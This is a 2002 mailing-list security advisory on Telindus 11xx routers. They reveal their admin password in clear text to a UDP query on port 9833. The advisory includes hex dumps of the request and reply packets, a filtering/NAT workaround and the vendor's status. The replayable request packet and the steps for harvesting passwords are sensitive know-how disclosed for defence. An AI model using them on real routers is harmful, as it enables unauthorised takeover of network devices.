[NEWS] Vulnerabilities Found in Telindus 11xx Router Series

From: support@securiteam.com
Date: 06/19/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Wed, 19 Jun 2002 09:27:50 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Vulnerabilities Found in Telindus 11xx Router Series
------------------------------------------------------------------------

SUMMARY

The 11xx router series by <http://www.telindus.com> Telindus has a very
serious remotely exploitable compromise, due to the fact that an intruder
may mimic the behavior of a desktop management application, thus getting
control of the router.

DETAILS

The 11xx router series has a management program, freely downloadable from
the Telindus site that allows an administrator to remotely manage the
router.

This program tries to discovery router boxes in the LAN through UDP
broadcast. Next it sends another different UDP unicast packet to the
answering boxes, to which the router answers with an UDP packet that
contains, among the others, the software revision number, the router name
and the password for accessing the device.

All the information is sent in clear text. All the traffic happens on UDP
port 9833.

It is possible to exploit this behavior in a billion ways: on a LAN it is
enough to download and run the administration tool while simply sniffing
the traffic. On a WAN it is enough to craft a hand-made packet that
queries the router in the same way the management program does.

As an example, this is the complete dump (with the Ethernet frame) of a
``request'' packet. The payload is the last 62 bytes, beginning from ``19
73 04'', the sender address is 172.16.0.16 and the router (recipient) is
172.16.0.253:

00 60 6C 1D BD 7E 00 00 86 60 62 F7 08 00 45 00
00 52 01 52 00 00 80 11 E0 1B AC 10 00 10 AC 10
00 FD 26 69 26 69 00 3E A8 DA 19 73 04 17 73 30
00 01 00 01 01 00 01 01 01 02 01 33 01 13 01 16
04 08 04 15 01 0D 01 0E 01 14 40 03 40 04 01 26
01 27 01 28 01 30 01 44 42 05 42 22 04 18 FF FF

This is the dump of an ``answer'' packet (with the Ethernet frame). The
payload is the last 204 bytes, beginning from ``19 73 04''. The password
has been replaced by ``x''

00 00 86 60 62 F7 00 60 6C 1D BD 7E 08 00 45 00
00 E0 25 9D 00 00 63 11 D8 42 AC 10 00 FD AC 10
00 10 26 69 26 69 00 CC 00 00 19 73 04 17 73 30
00 03 00 01 01 00 00 05 45 51 43 41 59 01 01 00
0D xx xx xx xx xx xx xx xx xx xx xx xx xx 01 02
00 32 4E 44 31 30 36 30 56 45 2D 54 4C 49 2C 20
76 65 72 20 35 2E 33 2E 31 31 42 3B 54 68 75 20
44 65 63 20 20 36 20 31 36 3A 33 36 3A 33 33 20
32 30 30 31 01 33 00 02 00 3C 01 13 00 06 00 60
6C 1D BD 7E 01 16 00 06 00 00 86 60 62 F7 04 08
00 02 00 01 04 15 00 02 00 FF 01 0D 00 04 00 00
00 00 01 0E 00 04 00 00 00 00 01 14 00 02 00 00
40 03 00 02 00 00 40 04 00 02 00 00 01 26 00 00
01 27 00 00 01 28 00 00 01 30 00 02 00 02 01 44
00 00 42 05 00 00 42 22 00 00 04 18 00 00

Solution:
We have not been able to understand if this ``feature'' can be disabled.
Otherwise, it seems that the only solution would be to filter the traffic
on UDP port 9833 directed to the box.

A quick and dirty workaround is to redirect WAN traffic to port 9833/udp
to another IP address in the LAN, better if it's an unused one. This can
be achieved by connecting (via telnet) to the router, logging in, and
issuing the following command: ``add auto udp 9833 9833 9833 10.0.0.10'',
where 10.0.0.10 is some unused IP address in your LAN. This sets up a
static NAT rule that redirects traffic entering WAN interface. Then, you
must also enter the command ``save'' to save your configuration to NVRAM.
You can optionally check the status of the NAT table by issuing ``show
auto''. If you made some mistake, you can ``del auto <number>'', and then
retry. Maybe there are better methods, we used this one because of we
already knew how to use the command ``auto''.

Vendor status:
We contacted Telindus, through their Italian office. They told us that
they are actively working on this issue. We told them that after a month
we would have informed the security community of the problem.

Telindus told us that a beta version of the firmware should be available
soon. Last but not least, the banner of the router has the word Arescom in
it, so perhaps other devices from that vendor are exploitable.

ADDITIONAL INFORMATION

The information has been provided by <mailto:finelli@ieee.org> finelli.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages